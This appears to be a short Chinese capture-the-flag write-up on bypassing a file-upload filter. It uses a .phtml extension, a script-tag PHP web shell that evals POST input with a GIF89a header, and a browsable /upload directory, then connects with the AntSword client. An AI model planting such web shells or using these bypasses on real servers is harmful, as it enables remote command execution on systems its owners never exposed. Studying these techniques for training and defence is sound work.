考点：

• 文件上传黑名单绕过
• 内容绕过
• 目录浏览

文件上传

1. 测试是黑名单还是白名单

上传图片1.png成功，上传1.php失败，1.pngs成功，说明是黑名单过滤。

所以要寻找黑名单外的php文件：php, php3, php5, php7, phtml都能作为php文件解析

ps：有些服务器默认不解析php3 phhtml等，如phpstudy2018中，需要设置

.phtml能成功上传

2. 判断是否对内容进行过滤

发现过滤 <?，而普通的php 木马都会携带<?，我们可以使用js+php进行bypass，这样在shell中就不会携带<?

<script language='php'>@eval($_POST['cmd']);</script>

再次提交，提示不是一张图片

加个gif文件头

GIF89a <script language='php'>@eval($_POST['cmd']);</script>

成功上传

3. 寻找上传的文件位置

页面只提示了上传文件名，未能发现上传的路径

所以尝试是否存在目录浏览，经测试发现/upload目录可以浏览

找到上传的文件使用蚁剑连接